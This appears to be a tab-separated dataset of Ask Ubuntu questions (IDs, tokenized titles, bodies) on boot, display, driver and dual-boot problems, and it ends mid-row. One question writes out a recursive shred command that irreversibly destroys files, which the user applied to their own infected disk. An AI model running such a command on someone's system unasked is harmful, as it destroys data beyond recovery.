326192	laptop boots to black screen on 13.04 , but works when an external monitor is plugged in	i just picked up a new laptop ( toshiba satellite p55-a5200 ; on-board intel graphics presumably hd graphics 4000 as this is a mobile i5 ivy bridge system ) and have been getting all sorts of odd display issues . windows 8 , which was pre-installed , worked fine and without issue ( aside from , y'know , being windows 8 ) . initially i found that i was unable to get the livecd to load when selecting `` try ubuntu '' only a black screen . the backlight was on and the laptop gave signs of life , but nothing . eventually by adding `` nomodeset '' or `` i915.enable=0 '' ( presumably this was disabling the load of the i915 driver since there is no such flag ) i was able to view the system as it attempted to load and would apparently lock up once x tried to start . removing `` quiet '' and `` splash '' revealed a bit more data , but nothing conclusive . most of the time ctrl-alt-del or pressing the power button would register so the system was n't hard-locked . unlike other issues i was never seeing `` no monitor found '' or getting a blinking cursor . eventually it was found that going into the `` install ubuntu '' option with `` i915.enable=0 '' worked perfectly . all of the widgets appeared properly and i was able to install normally . since this is essentially an x environment i thought the problem might be fixable and installed 13.04 reformatting the entire drive in the process . upon booting , however , the previous behavior resumed . the bios logo screen and grub would display properly and some text after grub would briefly flash past , but as soon as it attempted to go into graphical mode it just went to a black , backlit screen . after some work graphical plymouth was removed and replaced with the text version and the system would boot fully . setting capslock or such and then swapping between terminals showed that the switching was occurring properly . most surprising though it was found that if an external monitor was connected to either the hdmi or vga ports the both displays would come to life regardless of whether the external monitor was on or off . the hdmi connection initially could be removed and the laptop display would still function , but on the second time testing this it no longer worked . connecting to vga would still work and would leave the laptop screen on after it was disconnected . if the external monitor was connected during boot this would not work and if the system was suspended the process would need to be repeated , but would work . either way aside from the display issue the system appears to be booting properly into x and nothing else has shown any problems . i 've been pulling my hair out over this issue for about a week with little idea what is causing it or how to fix it . i 've been through just about everything else that askubuntu or anything else i 've found online has suggested as an answer to little avail ( or , at least it only got me this far ) . any suggestions ?
326193	how do i change the default logon screen in 12.04	i 'm wondering how i would go about changing the default logon screen ( just the background ) in ubuntu 12.04 . i ca n't seem to figure it out .
326194	sudo hangs without prompting for password	i just did a fresh install of ubuntu and now when i try to use sudo in the terminal emulator , it just hangs there without even asking me for a password . if i switch to the terminal ( ctrl + alt + f1 ) and login , sudo works as expected . can someone help me to figure this out ?
326198	new ubuntu 12.04 installation not detecting huawei e1550	huawei e1550 ( internet device : isp etisalat , egypt ) is not showing-up on ubuntu 12.04 . any idea ? via lsusb it is recognized as : huawei technologies co. , ltd e169/e620/e800 hsdap modem . however , in media folder it does not show at all . can mode-switching be applied successfully ?
326203	is there any way to install cpanel/whm in ubuntu 13.04 server ?	i recently install ubuntu server 13.04 on vmware . now i want to know that is there any way to install cpanel/whm on this server ? regards , mahbub
326205	specify non-printing keys as input to shell command	ubuntu 12.04 lts server 64 i have a shell script that runs in unattended mode . the script executes a command that displays a curses/ncurses ui which normally expects the user to navigate a menu via keyboard . to emulate user-navigation , i need to input a sequence of keys : echo -e `` { up-arrow } { space-bar } { enter-key } '' | mycommand a literal space `` `` might work for { space-bar } and `` \n '' might work for { enter-key } but how to specify { up-arrow } ? note : in my research , i 'm finding some indication that the arrow-keys fall in the category of key-down , rather than key-press , so perhaps not possible to pipe arrow-keys as input ? thanks .
326206	12.04.2 lts hangs up on boot - but with startx start the graphical surface	3.2.0-48-generic-pae , ubuntu 12.04.2 lts , gnome 3.4.2 i updated the system today , and cleaned up with apt-get autoclean , apt-get autoremove and now i have a problem . at the start while the system booting you have a screen with the ubuntu logo and a line which shows that something is happening . and during this screen the system hangs up . if i hit esc , i can see the processes . the last line is where the boot stops : stopping system v runlevel compatibility [ ok ] or sometimes stopping mount network filesystems [ ok ] i do not have/had any network file system , and there is nothing in fstab like this . but , if i hit alt+f1 i got a tty and i can log in without any problem . than i can use the command startx , and i have my graphical surface , as before the problem . same problem if i choose an older kernel version in the grub . what could be the problem and the solution here ?
326211	is it possible to repackage an already installed ubuntu for an oem install ?	i 'd like to repackage an install of ubuntu into an iso to install it on other systems as oem with the packages i have installed ?
326212	ubuntu 13.04 does not appear it loads windows 8	hello i have installed ubuntu 13.04 from a pen drive but now i am trying to boot it and it just loads windows 8 without giving me any choice like before ( i have w7 computer and this never happened it always gave me the option on rebooting ) i saw some answers and it is a bit confusing what i have to do ( i am a novice user and do not understand all of the lingo ) but i do need some enlightenment as windows 8 that came pre-installed with my machine is the most horrible frustrating experience since windows me , can you please direct me or instuct me on what do i have to do to thanks in advaxe
326220	super bad partiton table !	okay let me tell you everything , first i had windows 8 and xp with dual-boot then i decided to remove windows xp and install ubuntu since xp is stupid and windows 8 run slow on the current machine i successfully installed ubuntu and everything went fine until my os got damaged , i rebooted my pc and found my account deleted and more and more errors anyway i repaired ubuntu by booting ubuntu installation on usb drive and choosing reinstall option now everything works fine , but im very very confused ! my whole hdd capacity : ~74gb my partition table was : 61gb for windows8 as the first partition ( /dev/sda1 ) 1gb swap partition for ubuntu as the second partition ( /dev/sda2 ) ( activated ) 12gb for ubuntu 13.04 itself as the third partition ( /dev/sda3 ) now and after repair : new volume : 1.1gb block device at ( /dev/mapper/cryptswap1 ) ( i activate it manually everyboot ) 61gb for windows8 as the first partition ( /dev/sda1 ) ( shows error and dos n't mount ) 12gb for ubuntu 13.04 as sixth partition ( /dev/sda5 ) ! ! 1gb swap for ubuntu ( /dev/sda6 ) ! ! new extended volume ( 12gb ) ( /dev/sda2 ) ! ! so now the over all capacity 93gb xd this partition table as `` disks '' app sees it so here 's my questions : how to fix all of this ? ? ? ? how can i make my windows8 partition works fine ? ? or simply make it work by adding read-only option in /etc/fstab ? ? how can i activate my original swap partition , i know how , but which one ? ? if it 's complicated or requires full reinstall , i could leave it like that since i hate this pc and and everything works fine , but how can i make the new swap volume which is on ( /dev/mapper/cryptswap1 ) activate automaticlly on reboot sorry for making you read all of this xd
326222	how to play sound in ubuntu with pyqt4 ?	it 's a big mess . i chose to write my app with qt ( pyqt4 ) because it should work with windows and linux . first , in windows i used qsound , it worked , but not under ubuntu . so i switched to qtmultimedia , much uglier and more complicated code than qsound , and yet again it is not working under ubuntu ! how do i get sound in ubuntu ? it ca n't be that hard , does n't it ? ? please name a working module or give any general tips .
326227	ubuntu 13.04 wifi issues ( realtek 8188ce )	i have ping issues meaning that my ping is normal but i get lag spikes , ping reaching 500-600ms . i suspect there is something wrong with the drivers because on windows there is no problem . also i have checked there are no interferences or anything else . any idea how to troubleshoot this ? thanks in advance , marios
326228	( lubuntu ) how do i make links to folders on my windows xp hard drive that is already mounted ?	i want to make a shortcut/link to my windows xp hard drive and put in the documents folder under home/* .
326230	ca n't get full resolution with dell u3011 monitor	ca n't get full resolution with the dell u3011 monitor . the machine is a lenovo m92p which has integrated graphics ( hd 4000 ) . the os is ubuntu 13.10 . any idea how to get the full resolution of 2560 x 1600 pixels ? the choices in the control panel for displays only get up to 1920 x 1200
326238	software center missing apps ?	i have recently made the switch from windows to linux , and am still trying to learn my way around this beautiful os . because i am new , i have not been able to familiarize myself with the awesome terminal tool and therefore rely heavily on ubuntu software center . i was reading a guide that suggested an app from the center but when i searched for it , nothing came up . i 've noticed more and more apps i look for are nonexistent . is there something i did wrong configuring my system that would cause this problem ? thanks in advance for your patience .
326239	can not access /etc/hosts	i can not open my /etc/hosts file . i would very much like to , i have tried logging in as root and changing the ownership and changing the permissions , please help . when i try to open the file i get : -bash : /etc/hosts : permission denied
326241	fix error - mount : only root can do that	i am trying to share folders between host os and guest os in virtualbox as shown in this tutorial - http : //helpdeskgeek.com/virtualization/virtualbox-share-folder-host-guest/ as instructed in the tut , i go into my linux ( l-ubuntu ) guest and type the command - mount -t vboxsf [ -o options ] sharedfoldername mountpoint when i do this , i get the error - mount : only root can do that . how do i become root and then execute the above command . i have a non-root solution here which i will try later - how do i mount a drive so that it is readable by me ?
326242	stream audio on the lan to output on wifi enabled speakers	seems i can use vlc to put out an audio stream on the lan . what do i need to look for in a cheap speaker that will receive the audio signal over wifi and transform and output acoustically . or is it not that simple ? googling leads me to pricey devices or very difficult build your speaker type hacks , and i 'd think this would be pretty straightforward and do n't want ( ca n't lol ) spend a lot of money . any guidance will be appreciated and i will write up my successes when i come out the other side . update : so it seems that it is n't so simple -- sending audio data over the lan to a wifi speaker -- because that 's only the half of it..the speaker has to be configured to accept and process the data stream , which means that some protocol needs to determine the format for the data packets for the server to serve and for the speaker node to process and output the acoustic signal . therein lies the rub and the reason why everywhere you turn the talk is all about proprietary formats and hardware . so i guess my question is what server can i use to send audio data in what format to what type of speaker if i am looking to do this on the cheap .
326247	detect if radiance or ambiance is the current look	to interactively change icon colors , i want my program to be able to detect whether ambiance or radiance is the current looks . i found this value to be stored in dconf-editor under org- > gnome- > desktop- > interface- > gtk-theme . where is the file from which my program can read this value ?
326253	unable to dual boot ubuntu and windows 8 ( boot-repair corrupts the installation )	i 've been struggling with installing ubuntu 13.04 on my laptop ( i believe it 's asus n56vz ) . i 'm running on pre-installed windows 8 and even though i 'm able to install ubuntu ( 13.04 ) and boot it by setting it as the primary boot option from bios , i 'm unable to perform a clean dual boot ( the windows dual boot screen does n't show up , instead it just boots to windows if boot manager is set as the primary boot option ) . i 've tried : easybcd , no luck with it . i get a screen asking for windows installation cd with this option . boot-repair . i used ubuntu boot repair from a live session . it corrupted the booting totally ; i got booted to grub resque ( `` something too small '' ( not sure about the exact message ) when booting windows , unknown filesystem when booting the ubuntu ) . i had to change the boot to my liveusb and uninstall ubuntu with os-uninstall in order to get win8 operational . here 's the paste that boot-repair created : http : //paste.ubuntu.com/5926812/
326257	super+d ( show desktop ) changes which value ?	in my python program i want to detect if the desktop is to be shown ( all windows minimized ) . how do i do this ? which value ( perhaps in dconf ) is set when the user hits super+d ?
326261	crouton ubuntu chromebook	i have successfully installed ubuntu on acer c7 chromebook . i have used ctrl+alt+f1 ( ctrl+alt+f3 ) to get from chrome os to ubuntu xfce . i loaded libreoffice , etc . went back out to chrome and i ca n't get back into the ubuntu xfce install . i am getting password errors . the keyboard switch does not work anymore . using the terminal , i 'm very new to linux , i was able , a couple of times , to get into xfce using : sudo enter-chroot startxfce4 . now it appears that i ca n't get past the password thing . i know the password is correct . i have nothing of importance installed . do i need to wipe and reinstall ? i used the howtogeek tutorial on how to install ubuntu linux on your chromebook with crouton .
326280	screen magnifier in xubuntu 13.04	i installed xubuntu for reasons of stability and fluidity in my notebook . i used to have ubuntu with gnome shell , which used much screen magnifier ( i have vision problems ) . after that bad experience , due to the slowness of the system , but decided to reinstall ubuntu with unity , i spoke to also had a screen magnifier , the problem is that the system is quite slow and unstable because it froze and restarted at any moment the computer is not a good practice . met xubuntu , but apparently this little thought in people with some degree of visual impairment . i tried kmag - > not qualify . virtual magnifying glass 3.5 - > that qualifies half as wide the screen as usual , but locks the keyboard and mouse actions . i was told to install gnome orca , this is just a screen reader , does not help . any suggestions ?
326281	firefox use lot of cpu	i have a notebook nb510 toshiba with ubuntu 12.04 and firefox 22.0 with extensions like addock-plus , x-notifier , download helper , xmarks . sometimes it 's take more cpu than 100 % this information of firefox : @ nb510 : ~ $ top top - 02:23:57 up 18 min , 2 users , load average : 0.42 , 0.39 , 0.36 tasks : 153 total , 1 running , 152 sleeping , 0 stopped , 0 zombie cpu ( s ) : 3.9 % us , 0.8 % sy , 0.0 % ni , 95.2 % id , 0.0 % wa , 0.0 % hi , 0.0 % si , 0.0 % st mem : 2047344k total , 741132k used , 1306212k free , 54984k buffers swap : 2068352k total , 0k used , 2068352k free , 370208k cached pid user pr ni virt res shr s % cpu % mem time+ command 2320 john 20 0 576m 117m 36m s 117 5.9 1:31.67 firefox 1015 root 20 0 120m 39m 7588 s 9 2.0 2:02.09 xorg 2088 john 20 0 92592 15m 11m s 7 0.8 0:11.30 gnome-terminal 2183 john 20 0 2852 1176 888 r 1 0.1 0:08.58 top 9 root 20 0 0 0 0 s 0 0.0 0:06.83 kworker/1:0 1 root 20 0 3636 2052 1316 s 0 0.1 0:01.80 init 2 root 20 0 0 0 0 s 0 0.0 0:00.00 kthreadd 3 root 20 0 0 0 0 s 0 0.0 0:00.02 ksoftirqd/0 6 root rt 0 0 0 0 s 0 0.0 0:00.00 migration/0 7 root rt 0 0 0 0 s 0 0.0 0:00.24 watchdog/0 8 root rt 0 0 0 0 s 0 0.0 0:00.00 migration/1 10 root 20 0 0 0 0 s 0 0.0 0:00.13 ksoftirqd/1 12 root rt 0 0 0 0 s 0 0.0 0:00.05 watchdog/1 13 root rt 0 0 0 0 s 0 0.0 0:00.00 migration/2 15 root 20 0 0 0 0 s 0 0.0 0:00.03 ksoftirqd/2 16 root rt 0 0 0 0 s 0 0.0 0:00.00 watchdog/2 17 root rt 0 0 0 0 s 0 0.0 0:00.00 migration/3 18 root 20 0 0 0 0 s 0 0.0 0:00.88 kworker/3:0 and this from firefox paramètres de base de l'application nom firefox version 22.0 agent utilisateur mozilla/5.0 ( x11 ; ubuntu ; linux i686 ; rv:22.0 ) gecko/20100101 firefox/22.0 configuration de compilation about : buildconfig extensions nom version activée id british english dictionary 1.19.1 true en-gb @ dictionaries.addons.mozilla.org downloadhelper 4.9.17 true { b9db16a4-6edc-47ec-a1f4-b86292ed211d } element hiding helper pour adblock plus 1.2.3 true elemhidehelper @ adblockplus.org ubuntu firefox modifications 2.6 true ubufox @ ubuntu.com xmarks 4.2.1 true foxmarks @ kei.com x-notifier 3.3.3 true { 37fa1426-b82d-11db-8314-0800200c9a66 } préférences modifiées importantes nom valeur accessibility.typeaheadfind.flashbar 0 browser.cache.disk.capacity 1048576 browser.cache.disk.smart_size_cached_value 1048576 browser.cache.disk.smart_size.first_run false browser.places.smartbookmarksversion 4 browser.startup.homepage http : //www.google.fr/ig browser.startup.homepage_override.buildid 20130627161504 browser.startup.homepage_override.mstone 22.0 dom.mozapps.used true extensions.lastappversion 22.0 network.cookie.prefsmigrated true places.database.lastmaintenance 1375143077 places.history.expiration.transient_current_max_pages 52413 plugin.disable_full_page_plugin_for_types application/pdf plugin.importedstate true privacy.sanitize.migratefx3prefs true security.warn_viewing_mixed false storage.vacuum.last.index 0 storage.vacuum.last.places.sqlite 1375140331 accélération graphique description de la carte vmware , inc. -- gallium 0.4 on llvmpipe ( llvm 0x300 ) fenêtres avec accélération graphique 0/1 basic bloqué pour la version de votre pilote graphique . id du périphérique gallium 0.4 on llvmpipe ( llvm 0x300 ) id du vendeur vmware , inc. rendu webgl bloqué pour la version de votre pilote graphique . version du pilote 2.1 mesa 8.0.4 azurecanvasbackend cairo azurecontentbackend none azurefallbackcanvasbackend none javascript ramasse-miettes incrémentiel true accessibilité activée false empêcher l'accessibilité 0 versions des bibliothèques version minimale attendue version utilisée nspr 4.9.6 4.9.6 nss 3.14.3.0 basic ecc 3.14.3.0 basic ecc nsssmime 3.14.3.0 basic ecc 3.14.3.0 basic ecc nssssl 3.14.3.0 basic ecc 3.14.3.0 basic ecc nssutil 3.14.3.0 3.14.3.0 thank you for your help
326282	how to link a custom keyboard shortcut to a bash script in ubuntu 13.04 ?	as an ubuntu 13.04 user i had myself as well various problems and incompatibilities with this newest version of ubuntu . one of these is that the brightness bar has suddenly disappeared from the 'system settings -- > brightness & lock ' tab after i installed some packages ( which i do n't really remember what it was ) . i found out that a workaround is to use xbacklight . as an exercise for myself , i wrote a short script in order to easily increase and decrease the brightness using xbacklight from terminal . the script is executable ( has permission to execute ) , is an a directory that is included in $ path in my .bashrc file and is linked to an alias ( 'blup ' to increase and 'bldn ' to decrease screen brightness ) . so , my two aliases ( blup/bldn ) work perfectly fine from a terminal line . next , i wanted to link these to some keyboard shortcuts ( for instance f2/f3 ) . i did so in 'system settings -- > keyboard -- > shortcuts -- > custom shortcuts ' , but it did not work . why ? furthermore , is there a way to 'discover ' where and how other ( non-custom ) keyboard-shortcut commands are executed ? for instance , the volume-up shortcut what terminal line does it execute , what alias is connected to ( if any ) and what directory are they put at ( /usr/bin , something else ... ) ? as a newbie in script-writing i would appreciate any kind of help ! thanks p.s.1 of course , simply one can paste the command 'xbacklight -inc/-dec 10 ' to the custom keyboard shortcuts and it will work fine . i just want to seize the opportunity and get to know a bit more about script writing and executing . p.s.2 my problem is not the same as this one : how do i launch a bash script using a keyboard shortcut ? , ie , i use no '~/ ' for '/home/user/ ' .
326284	ubuntu 13.04 dark screen on live pendrive	i have a 2-3 year old gateway laptop that i wiped the hard drive to . i tried installing ubuntu 13.04 from a dvd and that did n't work , but that is n't the question i 'm asking . i am now trying to install ubuntu 13.04 from a live pendrive i created using the universal usb installer . it loads everything just fine , but when it loads the home screen , it is so dark , i can not see well enough to navigate . is there an ubuntu-specific key combination to turn up the screen brightness or anything else i should try ? edit - i tried using the fn + up/down arrow keys for brightness and they did not work .
326288	install two applications with the same name ?	i have installed an application for data recovery called `` r studio '' ( rstudio 2.0.377 ) . now i want to install another unrelated application for an ide of r programming language also called `` r studio '' ( rstudio 0.97.551 ) , by opening its .deb file in software center , but the software center says `` a later version already installed '' , and i ca n't find a way to proceed . how can i install them both on my ubuntu 12.04 ? thanks !
326291	hi i am new user for ubuntu	i want to use ubuntu for my small office with 15 computers . which version will be the best as i want monitor all the computers from my computer so that i can see there working progress as will as i can monitor there screen and history of there work for the day and is it possible to kill some process of there computers through my computer and monitor there browsing history or restrict to open few websites .
326292	how can i install the latest java ?	i recently upgraded ubuntu to 12.04 . i opened firefox and it says java plug-in 1.7.0_13 is outdated and vulnerable . i followed the link here for installing java for linux platforms : http : //www.java.com/en/download/help/linux_install.xml i do n't know what to do after this step : '' unpack the tarball and install java tar zxvf jre-7u7-linux-i586.tar.gz the java files are installed in a directory called jre1.7.0_07 in the current directory . in this example , it is installed in the /usr/java/jre1.7.0_07 directory . delete the .tar.gz file if you want to save disk space. `` does this mean that it 's installed ? i do n't think so , because i tried java -version in the terminal and it says the old 1.7.0_13 . any help would be appreciated .
326296	how to run ubuntu 13.04 on an external hard drive ?	i have an external hard drive and installed ubuntu 13.04 on it . i have a samsung ativ book 8 running windows 8 . when i go to boot , i get the grub menu and can boot into both windows or ubuntu . however , if i unplug the hard drive , a grub menu appears asking me to find the media to boot . how can i set it up so without the hard drive it just boots to windows ?
326297	chrome wo n't start	i upgraded ubuntu to 12.04 . i ca n't launch chrome from the taskbar , even though it 's the most recent version . in the taskbar , the icon is grayed out with a question mark . what 's going on ?
326299	12.04 install trouble	i 'm having trouble installing this os on my computer . it 's brand new gigabyte z77-hd3 intel pentium g2120 radeon hd 5040 ddr3 1333 16g 40g sata hdd 160g sata hdd burned this os to a cd from the website , booted it up to the install menu and selected install and ... ... nothing . it hanging on the ubuntu screen with the five dots that turns orange every time . i ran the `` check cd for errors '' , did n't turn up any errors . i also ran the memory test for 2 hours with zero errors . i have no clue what to do now
326300	ubuntu memmory consumption problem	ubuntu gnome on my laptop boot up using about 310 mb ram . when running couples of program , the system takes 700 to 900 mb . then , i close all programs , ram usage drops but it keeps at 450 ~ 600 mb ram . why does n't it drop to the initial status as booting up . how can i make the system to release ram automatically when all programs are closed .
326302	not what i expected from shred - help to interpret output	i have a windoz xp disk that got infected by a virus , a particularly nasty one that hides in a gazillion places and 'activates ' on many actions including plugging in any usb device , file writes , etc . i want to completely erase the files , not just mark the file deleted . so , using an ubuntu 12 live cd , i figured i could shred the c directory and eliminate the threat . so , to shred everything , i needed to follow each directory recursively . i used the following command : find * -exec shred -f -v -z -u { } \ ; for 20 gb of data , the shredding lasted about 28 hrs . after it was completed , i viewed the directory using : ls -l. i expected to see no files . what i saw instead was each filename with a green background . there were a few filename withouth the green background but the text was in green . so , what the heck does the green background mean , and more importantly , why are the files still there ?
326304	ssh-agent running but not working when logged in using putty	when i am using the terminal directly on the machine running ubuntu 13.04 ssh-add works fine using the process : /usr/bin/ssh-agent /usr/bin/dbus-launch -- exit-with-session /usr/bin/im-launch gnome-session -- session=ubuntu the above process is only started when i log in on the physical machine though . however , when i login remotely using putty and try ssh-add i instead get : '' could not open a connection to your authentication agent . '' this is even if i am logged in on the actual machine and thus the ssh-agent process is running as shown above . to get it working via putty i have to run exec ssh-agent bash . but then i have two ssh-agent 's running . is this normal or is there any way i can change the configuration so the ssh-agent is running automatically no matter if i log in on the machine direct or remote ?
326306	how to install ubuntu server with basic vga only instead of loading graphics card driver	i have an intel dn2800mt motherboard with a graphics card that is n't well supported . i 'm able to completely install ubuntu server on the machine , but when it boots after install i get a kernel panic , presumably because the graphic driver is tanking . how do i tell the installer ( or grub for that matter ) /not/ to load any graphics drivers ? i do n't care if i 'm stuck with 80x25 basic vga , the machine is a server and i 'll only be accessing it from ssh . i 've probably installed ubuntu a hundred times on various machines and am reasonably confident with the command line . many thanks !
326312	tons of processes running	i have an ubuntu 13.04 running on a p4 computer with 1 gb of ram ( i know , i need to get a new one ) . i recently have been getting crashes , and a lot of my memory is being used . so i looked in top and there 's literally hundreds of the same processes running . some are apache , postdrop , and sendmail . they 're hogging my ram ! how do i stop them ? let me know if you need more info .
326322	how do i install grub on what i believe is a raid setup ?	i have an older desktop computer with two hard drives that do not have the /dev/sda format so from my research i see , i 'm dealing with a fakeraid or raid setup . i have run the ubuntu 13.04 installation several times and so far nothing has worked . it always stops and gives me a fatal error that : grub can not be installed on /dev/sda . i have tried many options to install grub using the livecd , but nothing is working .
326326	ubuntu edge ; ubuntu touch ?	i have been looking forward to ubuntu touch for quite a bit of time , due to it 's desktop like functionality and beautiful display . but now i have heard of the ubuntu edge , and i am confused on the difference between the two . what i am getting at is : will there be a true ubuntu phone ( the ubuntu edge ) in 2014 while in october or november of this year the ubuntu touch os will be available to use and boot up on nexus products , or is the ubuntu touch just a first model of the ubuntu phone while the ubuntu edge is a second generation , more advanced model ? i am mainly worried because the edge is sort of lacking funding at this moment and i would really enjoy being able to have a ubuntu phone product within the next year .
326334	ubuntu bios boot macbook air	my dad installed ubuntu 12.04 on his macbook air as a clean install , and it worked great at first , but i recently began to work on it ( upgrading , updating , installing , and fixing some bugs ) , and eventually had to restart it . that is where i encountered some issues : when booting , i had to hold the `` option '' key to boot ubuntu , because he deleted the macintosh hd , and the efi was attempting to boot that , but could n't find it . thus , it gave only a white screen . the problem can be easily solved by holding the `` option '' key and selecting the drive , like i mentioned before , but that can be tedious when booting . next , there is another problem : sometimes even when booting the bios , it gives only a purple screen without allowing to select an os . so far , the booting process is a tedious string of holing `` option , '' selecting the drive , holding `` delete '' to load the bios , and finally selecting ubuntu . i do n't want my dad to have to go through that every time he boots . my main questions are as follows : first , is there a way to scrap the efi and boot directly to bios in ubuntu ? or maybe just set the efi to automatically boot to bios ? second , can i set bios to automatically boot to ubuntu ? if so , could i still be able to load it up by holding delete when needing to access the recovery disk ? thank you .
326335	thinking about doing a fresh installation and need to keep pytrainer data	i am thinking about doing a fresh install and setting up a dual boot windows and ubuntu system . i need to to keep my data from pytrainer on the next system.how can i do that . thank you
326342	installation of 12.04 on an usb stick	i already booted in with the usb stick , but when ever i try and open ubuntu or even installing it goes to commands and says : invalid argument can not mount . what does that mean ? how do i fix it ?
326348	grub2 - recovering windows recovery environment	i 've got an issue with windows recovery environment after the ubuntu installation , in particular after the installation of grub2 . on sda1 i 've got a windows 7 installation thing ( bootable , something like previously supplied windows installation cd but on hdd , the biggest mistake of microsoft ) . on sda2 i 've installed windows 7 which now i need to reinstall . grub2 sits at the first 512 b of sda with the following 4 entries : • linux ... • linux recovery ... . • windows 7 ... . • windows 7 recovery env ... everything works ok except for the windows recovery environment . the entry for windows recovery env is as follows : insmod part_msdos insmod ntfs set root= ' ( hd0 , msdos1 ) ' search -- no-floppy -- fs-uuid -- set da1e-3be0 drivemap -s ( hd0 ) $ { root } chainloader +1 after choosing windows 7 recovery env , i get the following error : booting a command list error : no argument specified , press any key to continue ... ... and then a black screen with a blinking cursor appears . i think i 've tried everything that i could only think of . i remember that when i first installed grub2 i had to do some manual changes to windows 7 entry because it would n't run either . so i tried in a various ways to modify the entry for windows recovery , but with no luck . i even did a backup of mbr ( first 512 b of my sda ) and tried to restore the windows boot from some other windows installation cd by running bootrec /fixmbr and then /fixboot ... but after this the thing got even worse because then on pc startup instead of loading windows directly , i only got a black screen with an annoying blinking cursor , so i had to recover my grub2 from the backup to boot anything at all . is there any way to get to the sda1 and boot the windows recovery thing from it ? i would be very grateful for any kind of hint !
326357	boot menu does not show up - dual boot windows 8 and ubuntu 12.04	the question i raise does not describe what troubles i am in , since there have been so many posts here discussing the same problem . i tried to make myself clearer by running boot-repair . and here is the result : you have installed on sda8 a linux version which is not efi-compatible . it is probably incompatible with your computer . please install an efi-compatible system . for example , linux-secure-remix-64bit and ubuntu-64bit are efi-compatible systems . hope this info is clear enough what can i do to make this dual-boot works ? to give a summary of what i did : i already have win 8 on my k45v asus in win 8 , i used disk management to create a new partition for ubuntu i burn an ubuntu 12.04 cd and boot from it i install ubuntu here there was a dialog showing some partition resizing but i did n't really know what it was for ? ( why does the installation automatically go into the newly created partiion ? ) after installation , i restarted the pc and the boot menu never shows up , but goes directly to windows 8 what 's the point now ? any comment is a big help for me thanks ! edit0 : output of sudo parted -l model : ata hitachi hts72755 ( scsi ) disk /dev/sda : 500gb sector size ( logical/physical ) : 512b/4096b partition table : gpt number start end size file system name flags 1 1049kb 316mb 315mb fat32 efi system partition boot 2 316mb 945mb 629mb ntfs basic data partition hidden , diag 3 945mb 1079mb 134mb microsoft reserved partition msftres 4 1079mb 201gb 200gb ntfs basic data partition 5 201gb 428gb 227gb ntfs basic data partition 7 428gb 428gb 1049kb bios_grub 8 428gb 474gb 46.1gb ext4 9 474gb 479gb 4166mb linux-swap ( v1 ) 6 479gb 500gb 21.5gb ntfs basic data partition hidden , diag model : wd my passport 07a8 ( scsi ) disk /dev/sdb : 1000gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 1049kb 1000gb 1000gb primary ntfs warning : unable to open /dev/sr0 read-write ( read-only file system ) . /dev/sr0 has been opened read-only . error : ca n't have a partition outside the disk ! output of sudo fdisk -l warning : gpt ( guid partition table ) detected on '/dev/sda ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x4ad209d2 device boot start end blocks id system /dev/sda1 1 976773167 488386583+ ee gpt partition 1 does not start on physical sector boundary . disk /dev/sdb : 1000.2 gb , 1000170586112 bytes 255 heads , 63 sectors/track , 121597 cylinders , total 1953458176 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00023f15 device boot start end blocks id system /dev/sdb1 2048 1953458175 976728064 7 hpfs/ntfs/exfat
326359	create an instance of one class from another class	i created browserview class named as `` bdrmenuview '' . it should be like `` class bdrmenuview ( browserview ) : '' . and the class contains the method named as `` createpictmenu '' . the whole class should be class bdrmenuview ( browserview ) : def createpictmenu ( self ) : now i have written one more class named as logoviewlet . it should be like `` class logoviewlet ( viewletbase ) : '' . and the class contains the method named as `` update '' . the whole class should be class logoviewlet ( viewletbase ) : def update ( self ) : now i want to call the method of browserview class from another class . i created an instance of one class like class logoviewlet ( viewletbase ) : def update ( self ) : a = bdrmenuview ( self , browserview ) -- -- -- -- - > instance of browserview class logoname = a.createpictmenu ( ) i want to know whether it is correct or not which i created .
326364	how to work with dd command ?	if i have executed below commands , dd if=/dev/zero of=/mnt/cdrom/usbfile.bin bs=1024 count=1048576 getting error as dd : opening `/mnt/cdrom/usbfile.bin ' : no such file or directory . how to create a usbfile.bin file ? i thought after executing above mentioned command , it will create usbfile.bin file . but i 'm getting error .
326365	13.04 hangs on the login screen	my system boots up as far as the login screen and then hangs just after it reaches it . it does n't freeze immediately , i can still move the mouse cursor for a second or two before it locks up . it does freeze before it loads my login screen image though . it just displays the standard purple background with the white dots instead . restarting just throws up the same problem again . i 'm running stock 13.04 , i update whenever the systems suggests i do so i should be running the latest updates . i believe i do have the proprietary graphics drivers ( radeon hd 7000 ) installed . i also elected to encrypt the harddrive when i installed ubuntu orignally ( not sure if that has any bearing on things ) . everything had been running fine until now . i tried using the answer from 13.04 - logon screen frozen . when i select `` network '' it prompts me with `` continuing with remount your / filesystem in read/write mode and mount any other filesystems defined in /etc/fstab '' , i click `` yes '' and it outputs some text and then freezes forever i 'm not sure if that 's related to my login woes or random weirdness . regardless , here 's the output when i click network : fsck from util-linux 2.20.1 /dev/mapper/ubuntu -- vg-root : clean , 296562/182624256 files , 419034331/730468352 blocks/dev/sda2 was no cleanly unmounted , check forces . /dev/sda2 : 272/124992 files ( 4.0 % non-contiguous ) , 140324/249856 blocks mountall : fsck /boot [ 991 ] terminated with status 1
326366	exchange mapi option not available after exchange support for the evolution groupware suite installed	my ubuntu version is 13.04 ( kyrin ) , 'evolution ' and 'exchange support for the evolution groupware suite ' are installed . but there was n't an option for exchange mapi available when i tried to sets my exchange account in 'evolution ' . -- - what i mean there is no such selection in the drop-down list ! the sever is 'ms exchange 2010 ' . 'owa ' in ubuntu and 'outlook 2013/2010 ' in windows for this account works correct . is there anyone encountered this problem ? i have no idea to deal this ... my evolution information as below : ii evolution 3.6.4-0ubuntu1 amd64 groupware suite with mail client and organizer ii evolution-common 3.6.4-0ubuntu1 all architecture independent files for evolution ii evolution-data-server 3.6.4-0ubuntu1 amd64 evolution database backend server ii evolution-data-server-common 3.6.4-0ubuntu1 all architecture independent files for evolution data server ii evolution-mapi 3.6.2-0ubuntu1 amd64 exchange support for the evolution groupware suite ii evolution-plugins 3.6.4-0ubuntu1 amd64 standard plugins for evolution ii libebackend-1.2-5 3.6.4-0ubuntu1 amd64 utility library for evolution data servers ii libebook-1.2-14 3.6.4-0ubuntu1 amd64 client library for 